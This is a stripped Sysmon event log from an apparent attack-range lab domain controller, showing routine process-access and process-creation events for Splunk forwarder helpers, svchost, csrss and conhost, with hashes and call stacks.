16:10:10.551{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-55E2-6008-FA06-00000000A301}5844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55E2-6008-FA06-00000000A301}5844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.551{7901BC46-55E2-6008-FA06-00000000A301}5844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:10.019{7901BC46-55E1-6008-F906-00000000A301}16128164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.519{7901BC46-55E3-6008-FB06-00000000A301}74767148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55E3-6008-FB06-00000000A301}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-55E3-6008-FB06-00000000A301}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.363{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55E3-6008-FB06-00000000A301}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:11.223{7901BC46-55E3-6008-FB06-00000000A301}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55E4-6008-FC06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-55E4-6008-FC06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.144{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55E4-6008-FC06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:12.005{7901BC46-55E4-6008-FC06-00000000A301}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.925{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FF06-00000000A301}7712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.925{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FF06-00000000A301}7712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.644{7901BC46-55FA-6008-FF06-00000000A301}77126728C:\Windows\system32\conhost.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.534{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-55FA-6008-FF06-00000000A301}7712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.534{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 